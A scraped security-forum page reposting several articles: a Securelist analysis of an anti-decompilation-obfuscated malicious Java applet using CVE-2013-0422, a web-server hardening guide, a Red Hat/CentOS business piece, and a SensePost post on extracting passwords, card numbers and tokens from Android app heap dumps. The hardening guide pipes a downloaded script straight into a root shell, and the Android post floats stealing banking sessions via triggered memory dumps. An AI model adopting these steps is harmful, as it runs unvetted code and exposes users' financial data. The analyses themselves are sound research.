an overview of what the applet does. However the point here was to analyze the vulnerability that this .jar file exploits. At this point I should say that I was biased. I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit kit. In this report they said that the malware dropped by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue which might confirm this would be verdicts from AV vendors, but this time it was not the case: https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/ Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet: package QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk extends Applet But quickly we see that something is not working. The names of the classes and methods are random and the strings obfuscated, but this is nothing to worry about. However in this case we see that the decompiler is showing strange “code”: public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } Or it is not able to decompile methods of the class directly and is just showing up the bytecode as comments: public void ttiRsuN() throws Throwable {// Byte code: // 0: ldc_w 10 // 3: iconst_4 // 4: ineg // 5: iconst_5 // 6: ineg // 7: pop2 // 8: lconst_0 // 9: pop2 Now I was starting to wonder how bad the situation was? Could I still get enough information to discover which CVE is exploited by this .jar? Time for some serious digging! I started to rename the classes based on their first letters (ZqnpOsRRk to Z, CvSnABr to C, etc) and to match the methods with what I thought they were doing. It’s much like any RE using IDA. There was a lot of “strange” code around, which got strange interpretations from the decompiler. I decided to delete it to tidy up the task. Of course, there was a risk that I might delete something important, but this time it looked like misinterpretations of the bytecode, dead code and unused variables. So I deleted things like: public static String JEeOqvmFU(Class arg0) { (-5); (-2.0F); return 1;Where I saw commented bytecode (not decompiled by JD-GUI), I deleted everything but the references to functions/classes. At the end I had a much cleaner code, but I was very worried that I might be missing important parts. For instance, I had procedures which just returned NULL, function which just declared variables, unused variables, etc. How much of this, if any, was part of the expolit and how much was just badly interpreted code? At least I was able to get something useful after cleaning the code. I was able to localize the function used to deobfuscate the strings: public static String nwlavzoh(String mbccvkha) {byte[] arrayOfByte1 = mbccvkha.getBytes(); byte[] arrayOfByte2 = new byte[arrayOfByte1.length]; for (int i = 0; i < arrayOfByte1.length; i++) arrayOfByte2 = ((byte)(arrayOfByte1 ^ 0x44)); return new String(arrayOfByte2); } Not exactly rocket science. Now I could decompile all the strings, but I still didn't have a clear idea of what was happening in this .jar. Step 2: Different strategy Seeing that the code was not decompiled properly I remembered that to check which vulnerability is being exploited you don’t really need a fully decompiled code. Finding the right clues can point you to the right exploit. At this point I thought that it might be CVE-2013-0422, so I decided to get more information about this vulnerability and see if I could find something in the code to confirm this. This CVE was discovered in January 2013. Oracle was having a bad time just then, and shortly afterwards a few other Java vulnerabilities were exposed. I downloaded a few samples from VirusTotal with this CVE. All of them were easily decompiled and I saw some ways to implement this vulnerability. But there was no big clue. I decided also to try a few other decompilers, but still got no results. However when taking a second look at the results of running a now-obsolete JAD I saw that the decompiled code was quite different from the one of JD-GUI, even though it was still incomplete and unreadable. But there were different calls with obfuscated strings to the deobfuscation function. The applet uses a class loader with the obfuscated strings to avoid detection, making it difficult to know what it is loading without the properly decompiled strings. But now I had all of them! After running the script I got: com.sun.jmx.mbeanserver.JmxMBeanServernewMBeanServer javax.management.MbeanServerDelegateboolean getMBeanInstantiator findClass sun.org.mozilla.javascript.internal.Context com.sun.jmx.mbeanserver.Introspector createClassLoader Now this was much more clear and familiar to me. I had another look at one of the PDFs I was just reading and bingo! https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf So finally I could confirm the CVE was indeed CVE-2013-0422. Step 3: Why didn’t the Java Decompiler work? In these cases it is always possible to take another approach and do some dynamic analysis debugging the code. If you want to go this way I recommend reading this for the setup: Understanding Java Code and Malware | Malwarebytes Unpacked However, I couldn't stop thinking about why all the decompilers failed with this code. Let's take a look at the decompiled bytecode manually. We can easily get it like this: javap -c -classpath LOCAL_PATH ZqnpOsRRk > ZqnpOsRRk.bytecode Let's take a look to the code we get and what it means, with an eye on the decompiled code. We will need this: Java bytecode instruction listings - Wikipedia, the free encyclopedia public QPAfQoaG.ZqnpOsRRk(); 0: aload_0 1: invokespecial #1; //Method java/applet/Applet."<init>":()V 4: dconst_0 << push 0D 5: dneg << -0D 6: pop2 << pop -0D 7: nop 8: return 9: lconst_1 <<deadcode_from_here 10: pop2 11: goto 14 14: iconst_2 15: iconst_2 16: pop2 17: iconst_1 18: pop and the decompiled code with the corresponding instruction numbers: public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } So we can see how a method which just provides returns leaves a lot of garbage in the middle. The decompiler cannot handle this and tries to interpret all these operations, these anti-decompilation artifacts. It just adds a lot of extra noise to the final results. We can safely delete all this. public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { return; } There are TONS of these artifacts in the bytecode. Here a few examples: 1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 There are also a lot of nonsense jumps, such as push NULL then jump if null, gotos and nops. Basically it’s difficult to delete these constructors from the bytecode because the parameters are different and don’t always throw up the same opcodes. It’s up to the decompiler to get rid of this dead code. After a couple of hours manually cleaning the code and reconstructing it from the bytecodes, I could finally read the result and compare it with the original decompiled one. Now I understood what was happening and what was wrong with the original code I could safely delete the dead code and introduce readable names for classes and methods. But there was still one unanswered question: why was the first decompiler unable to deobfuscate all the strings, and why did I have to use JAD to get everything? JD-GUI returns the bytecode of the methods that it cannot decompile but for instructions such as ldc (that puts a constant onto the stack) it does not include the constant along with the instruction in the output code. That's why I couldn't get them until I used a second decompiler. For example: JD-GUI output: // 18: ldc 12 Bytecode output: 18: ldc #12; //String '+)j71*j.)<j)&!%*7!62!6j^N)<t^F!%*^W!62!6 JAD output: class1 = classloader.loadClass(CvSnABr.nwlavzoh("'+)j71*j.)<j)&!%*7!62!6j16)<t06!%*27!62!6")); In the bytecode, happily, we can find all these references and complete the job. Final thoughts When I was working in this binary I remembered a presentation in BH 2012 about anti-decompiling techniques used for Android binaries. This was the first time I had personally encountered a Java binary implementing something similar. Even they are not that difficult to avoid, the analysis is much slower and it can be really hard to crack big binaries. So there are two open questions: first, what can be done, from the decompiler’s perspective, to avoid these tricks? I’m hoping to discuss this with the authors of JD-GUI. Secondly, how can we make code “undecompilable”? Are there automatic tools for this? Again, I’m hoping to find out more, but please contact me if you have anything useful to share. Sursa: https://www.securelist.com/en/analysis/204792300/Anti_decompiling_techniques_in_malicious_Java_Applets
  19. WEB SERVER SECURITY Rohit Shaw August 16, 2013 This article gives you a short and understandable summary about web servers, the different types of servers, the security add-on software installation process, and security aspects In this article we will learn the installation of a control panel and a benefits of add-on security software. Web servers, just as a general introduction, are the big computers that serve as website hosts for a particular organization. The common characteristics that web servers have are public IP addresses and domain names. This information may sound boring but is offered for beginners. Security is a standard that has developed to protect the web server from intrusions, hacking attempts, and other malicious uses. A brief introduction to the types of web servers: There are those based on Microsoft Windows and those based on Linux, which are respectively named Microsoft IIS Server and Apache (these are the most common, although there are others like Nginx, Cherokee, and Zeus, etc). Throughout my article, I will introduce the techniques of hardening a web server, which is a chief role in web server security. The attack vectors on a web server depend on both the web application security that is hosted on the web server and the web server security, which includes operating system hardening, application server hardening, etc). Starting with the web server security, the first point of analysis for exploiting the server would be the services. I would suggest all the server security administrators should run a service to check on all the ports that are open, filtered, and closed. One of the best tools would be Nmap for scanning the network. Use a control panel for managing the hosted websites on the server. There are many control panels available, such as cPanel, Parallel Plesks, DirectAdmin, Webmin, ISPconfig, Virtualmin, etc. The chief benefit of using a control panel is that it provides a graphical web-based interface with a client-side interface. It is extremely easy to navigate, with an icon-based menu on the main page. A server administrator can use a control panel to set up new websites, email accounts and DNS entries. With the control panel, you can also upgrade and install new software. After that, install Atomic Secured Linux (ASL) in your web server; it is an add-on for Linux systems. We will discuss ASL later in this article. Now I am going to show you how to set up a control panel on a web server. Here we are going to install cPanel and WHM (Web Host Manager). cPanel Setup Manual Prerequisites: Before installing cPanel we need to fulfill some conditions: Your IP must be static before purchasing cPanel. It will not work properly with a dynamic IP address. The hostname on your server must be a fully qualified host name (FQHN); for example, web.domain.com. You can change the “hostname=” line in etc/sysconfig/network and then you must restart your network. Hostname Change:For changing the host name, there are usually three steps, as follows: Sysconfig/Network—Open the /etc/config/network file with any text editor. Modify the HOSTNAME=value to match your FQHN host name. # vi /etc/sysconfig/network HOSTNAME=myserver.domain.com Host file—Change the host that is associated with your main IP addresses for your server; this is for internal networking. (Found at /etc/hosts) Run hostname—This command allows modifying the hostname on the server, but it will not actively update all programs that are running under the old hostname. Restart Networking: After completing the above prerequisites and requirements we are done and we just give a reboot to the system to accept the changes. We can reboot by using this command: # /etc/init.d/network restart Downloading cPanel: After registering your IP, we have to input a command as root user in the terminal; that is, wget http://www.layer1.cpanel.net/latest cPanel Installation: After downloading the installer file, type in the following command as root user:sh latest After the install is complete, you should see this: “cPanel Layer 2 install complete.” Now point your web browser to port 2086 0r 2087 by providing your IP address directly in the web browser: https://youriphere:2087 NOTE: There is no method of uninstalling cPanel. You will have to reload the operating system. Now, after installing cPanel, the server is safe from rooting attacks, which hackers use for compromising all websites that are hosted on the same server. But the main critical threats are PHP shell execution and the DDoS attack on the server, which are not prevented by using a cPanel. So we just started looking for an anti-DDoS solution on the Internet and we found one, called as Atomic Secured Linux. Atomic Secured Linux Atomic Secured Linux is an easy-to-use, out-of-the-box unified security suite add-on for Linux systems, designed to protect servers against zero-day threats. Unlike other security solutions, ASL is designed for beginners and experts alike. You just install ASL on your existing system and it does all the work for you. This add-on was developed to create a unique security solution for beginners and experts ASL works by combining security at all layers, from the firewall to the applications and services and all the way down to the kernel, to provide the most complete multi-spectrum protection solution available for Linux servers today. It helps to ensure that your system is secure and also compliant with commercial and government security standards. Features Complete intrusion prevention Stateful firewall Real-time shunning/firewalling and blocking of attack sources Brute force attack detection and prevention Automatic self-healing system Automated file upload scanning protection Built-in vulnerability and compliance scanner and remediation system Suspicious event detection and notification Denial of service protection Malware/antivirus protection Auto-learning role-based access control Data loss protection and real-time web content redaction system Automated secure log management with secure remote logging Web based GUI management Kernel protection Built-in virtualization Auto healing/hardening Atomic Secured Linux works on various platforms, such as CentOS, Red Hat Enterprise Linux, Scientific Linux, Oracle Linux, and Cloud Linux. It also supports many control panels, including cPanel, Virtualmin, DirectAdmin, Webmin, and Parallel Plesk. Now I am going to show you how to install Atomic Secured Linux. It is quite easy to install. Open the terminal for root use and type in: wget -q -O – https://www.atomicorp.com/installers/asl |sh Follow the instructions in the installer, being sure to answer the configuration questions appropriately for your system. Once the installation is complete, you will need to reboot your system to boot into the new hardened kernel that comes with ASL. You do not have to use this kernel to enjoy the other features of ASL, but we recommend that you use it, because it includes many additional security features that are not found in non-ASL system. Now log in to your GUI at https://youriphere:30000.You can view alerts, block attackers, configure ASL, and use its many features from the GUI. It protects from cross-site scripting, SQL injection, remote code inclusion, and many other web-based attacks. It intelligently detects search engines to prevent accidental blocking of web crawlers. It detects suspicious events and events of importance and sends alerts about events such as privilege escalation, software installation and modification, file privilege changes, and more. ASL detects suspicious processes, files, user actions, hidden ports, kernel activity, open ports, and more. It has a built-in vulnerability and compliance scanner and remediation system to ensure that your system is operating in a safe, secure, and compliant manner. It automatically hardens Linux servers based on security policies and ships with a world-class set of policies developed by security experts. Also, it automatically disables unsafe functions in web technologies such as PHP to help prevent entire classes of vulnerabilities; for example, executing PHP shells. It detects and blocks brute force and “low and slow” attacks on web applications and intelligently identifies when a web application has denied access, even for login failures. Alerting is done for all domains hosted on a server. The graphical user interface of the firewall is easy to use and maintain. The advanced configuration of ASL allows handling PHP shell functions, antivirus, mod security rules, rootkit hunter, etc. Hence we conclude that, after doing these things, your web server will be secured from attacks. Nowadays, most of the websites hacked are hosted by a shared server. An attacker’s main method is to upload a PHP shell to a web server through a vulnerable website, from which an attacker can deface all websites hosted on that server. That’s why we suggest using cPanel, because cPanel provides separate accounts for all website owners; if an attacker can upload a PHP shell from a website, he will not have access to all the other websites that are hosted on that server, he can only deface that particular site. We also discussed Atomic Secured Linux: It blocks attacks and alerts from all types of attacks. Specifically, it blocks the PHP shell functions and disables the PHP shell from executing in the web server. References CentOS/REL - Installing cPanel & WHM 11.24 | Knowledge Center | Rackspace Hosting https://www.atomicorp.com/products/asl.html Sursa: WEB SERVER SECURITY
  20. x86 Code Virtualizer Src Fh_prg Hello every body Here is my code virtualizer source code , now public download and enjoy Attached Files VM.zip (153.9 KB, 48 views) Sursa: x86 Code Virtualizer Src
      • 1
      • Like
  21. rstforums.com/forum/74095-coca-cola-666-a.rst OMG, RST e posedat! FALS. Noi suntem diavolii, noi nu putem fi posedati.
  22. Super, sper sa fie si cativa open-source.
  23. Toata lumea vine la Sud.
  24. Red Hat CEO: Go Ahead, Copy Our Software While most companies fight copycats, Red Hat embraces its top clone, CentOS. Here's how that helps it fight real enemies like VMware. Matt Asay August 13, 2013 Imagine your company spent more than $100 million developing a product. Now imagine that a competitor came along and cloned your product and distributed a near-perfect replica of it. Not good, right? If you're Apple, you spend years and tens of millions of dollars fighting it, determined to be the one and only source of your product. If you're Red Hat, however, you embrace it—as Red Hat CEO Jim Whitehurst told ReadWrite in an interview. After Unix For years the enterprise data center was defined by expensive hardware running varieties of the Unix operating system. Over time, both Windows and Linux chewed into Unix's market share, with Red Hat winning the bulk of the Linux spoils. The key to victory? Both Windows and Linux offered low-cost, high-value alternatives to Unix's sky-high pricing. With Unix cowering in a corner, one would think that the battle would shift to Linux versus Windows. The reality, however, is somewhat different. As Whitehurst tells it, Red Hat "certainly competes" with Microsoft, but "generally those IT decisions are made at the architecture level before you get into a specific Linux versus Windows bake-off." Today enterprise architecture tends to be Linux-based, while 10 years ago it was Windows, which means that more often than not, Red Hat Enterprise Linux is baked into enterprise IT decisions. "Going forward with new workloads, they are heavily Linux-based," notes Whitehurst. As such, Whitehurst doesn't "worry about Microsoft long-term, because it's Red Hat and VMware that are defining future data center strategy." Taking On VMware Ah, yes, VMware. Sun Microsystems, in its day the leading Unix vendor but now swallowed up by Oracle, once provided Red Hat with a handy villain to target. Today data-center software maker VMware is Red Hat's Enemy Number One. The reason is simple: No other company more closely matches Red Hat's ambitions, albeit with a very different approach. As Whitehurst emphasizes, "When you start thinking about where the future of the data center is going, VMware has a similar view to ours, but they're doing it with a proprietary innovation model and we're open." How open? So open that not only is Red Hat fighting VMware with its own open-source products, but it's also embracing clones like CentOS. While open source is increasingly established within the technology world, few understand its implications for an open-source software business. In the case of Red Hat, it develops the popular Red Hat Enterprise Linux (RHEL) operating system. But because Linux is a community-developed OS, Red Hat must release all of its Linux code to others. (Instead of charging for a software license per se, Red Hat has customers pay for a subscription that covers services and support.) This paves the way for an organization like CentOS to develop a "a Linux distribution derived from ... a prominent North American Enterprise Linux vendor" which "aims to be 100% binary compatible" with that Linux vendor. It's the imitator that dare not speak its name, but everyone knows CentOS is a like-for-like Red Hat clone. How can this possibly be good for Red Hat? Embracing The Parasite While some like Microsoft have threatened Red Hat with the specter of even greater competition from CentOS, Whitehurst argues that CentOS "plays a very valuable role in our ecosystem." How? By ensuring that Red Hat remains the Linux default: CentOS is one of the reasons that the RHEL ecosystem is the default. It helps to give us an ubiquity that RHEL might otherwise not have if we forced everyone to pay to use Linux. So, in a micro sense we lose some revenue, but in a broader sense, CentOS plays a very valuable role in helping to make Red Hat the de facto Linux. But couldn't another Linux vendor like SuSE or Canonical, the primary backer of Ubuntu, undercut Red Hat with an equally free OS? If $0 is the magic price point, other Linux vendors can easily match that, right? Whitehurst responds: "SuSE often comes in at a lower price point than RHEL, but most people would prefer to have a common code base like RHEL plus CentOS than a cheaper but always fee-based enterprise SuSE." In other words, only Red Hat can offer the industry's leading Linux server OS and also offer—albeit indirectly—that same product for free. Microsoft has tacitly acknowledged a similar phenomenon: While the company spends heavily to fight piracy, founder Bill Gates noted in 1998 that illegal copies of its Windows operating system in China helped seed demand for the paid version. While I'm sure Red Hat's salesforce doesn't love competing with its copycat, the reality is that sales are almost certainly helped in accounts that only want RHEL for production servers and can shave costs by using CentOS for development and test servers. CentOS, in other words, gives Red Hat a lot of pricing leverage, without having to lower its prices. Embracing Developers Arguably one critical area that CentOS hasn't helped Red Hat is with developers. While developers want the latest and greatest technology, Red Hat's bread-and-butter audience over the years has been operations departments, which want stable and predictable software. (Read: boring.) CentOS, by cloning RHEL's slow-and-steady approach to Linux development, is ill-suited to attracting developers. So Red Hat is trying something different, dubbed Red Hat Software Collections. Collections includes "a collection of refreshed and supported web/dynamic languages and databases for Red Hat Enterprise Linux." Basically, Collections give developers a more fast-moving development track within slower-moving RHEL. Or, as Whitehurst tells it, "Collections is Red Hat's way of embracing developers while keeping its appeal for operations." It will be interesting to see how this plays out. Red Hat has a long way to go in its goal to define the open data center, but with its embrace of CentOS to give it licensing leverage and of Collections to give it developer credibility, Red Hat is on the right track. Sursa: http://readwrite.com/2013/08/13/red-hat-ceo-centos-open-source
  25. [h=1]Poking Around in Android Memory[/h] Tags: memory, analysis, mobile, programming, public — etienne @ 16:31 Taking inspiration from Vlad's post I've been playing around with alternate means of viewing traffic/data generated by Android apps. The technique that has given me most joy is memory analysis. Each application on android is run in the Dalvik VM and is allocated it's own heap space. Android being android, free and open, numerous ways of dumping the contents of the application heap exist. There's even a method for it in the android.os.Debug library: android.os.Debug.dumpHprofData(String filename). You can also cause a heap dump by issuing the kill command: kill -10 <pid number> But there is an easier way, use the official Android debugging tools... Dalvik Debug Monitor Server (DDMS), -- "provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more." Once DDMS is set up in Eclipse, it's simply a matter of connecting to your emulator, picking the application you want to investigate and then to dump the heap (hprof). 1.) Open DDMS in Eclipse and attach your device/emulator * Set your DDMS "HPROF action" option to "Open in Eclipse" - this ensures that the dump file gets converted to standard java hprof format and not the Android version of hprof. This allows you to open the hpof file in any java memory viewer. * To convert a android hprof file to java hprof use the hprof converter found in the android-sdk/platform-tools directory: hprof-conv <infile> <outfile> 2.) Dump hprof data Once DDMS has done it's magic you'll have a window pop up with the memory contents for your viewing pleasure. You'll immediately see that the applications UI objects and other base classes are in the first part of the file. Scrolling through you will start seeing the values of variables stored in memory. To get to the interesting stuff we can use the command-line. 3.) strings and grep the .hprof file (easy stuff) To demonstrate the usefulness of memory analysis lets look at two finance orientated apps. The first application is a mobile wallet application that allows customers to easily pay for services without having to carry cash around. Typically one would do some static analysis of the application and then when it comes to dynamic analysis you would use a proxy such as Mallory or Burp to view the network traffic. In this case it wasn't possible to do this as the application employed certificate pinning and any attempt to man in the middle the connection caused the application to exit with a "no network connection" error. So what does memory analysis have to do with network traffic? As it turns out, a lot. Below is a sample of the data extracted from memory: And there we have it, the user login captured along with the username and password in the clear. Through some creative strings and grep we can extract a lot of very detailed information. This includes credit card information, user tokens and products being purchased. Despite not being able to alter data in the network stream, it is still easy to view what data is being sent, all this without worrying about intercepting traffic or decrypting the HTTPS stream. A second example application examined was a banking app. After spending some time using the app and then doing a dump of the hprof, we used strings and grep (and some known data) we could easily see what is being stored in memory. strings /tmp/android43208542802109.hprof | grep '92xxxxxx' Using part of the card number associated with the banking app, we can locate any references to it in memory. And we get a lot of information.. And there we go, a fully "decrypted" JSON response containing lots of interesting information. Grep'ing around yields other interesting values, though I haven't managed to find the login PIN yet (a good thing I guess). Next step? Find a way to cause a memory dump in the banking app using another app on the phone, extract the necessary values and steal the banking session, profit. Memory analysis provides an interesting alternate means of finding data within applications, as well as allowing analysts to decipher how the application operates. The benefits are numerous as the application "does all the work" and there is no need to intercept traffic or figure out the decryption routines used. [h=3]Appendix:[/h] The remoteAddress field in the response is very interesting as it maps back to a range owned by Merck (one of the largest pharmaceutical companies in the world Merck & Co. - Wikipedia, the free encyclopedia) .. No idea what it's doing in this particular app, but it appears in every session I've looked at. - See more at: SensePost Blog
×
×
  • Create New...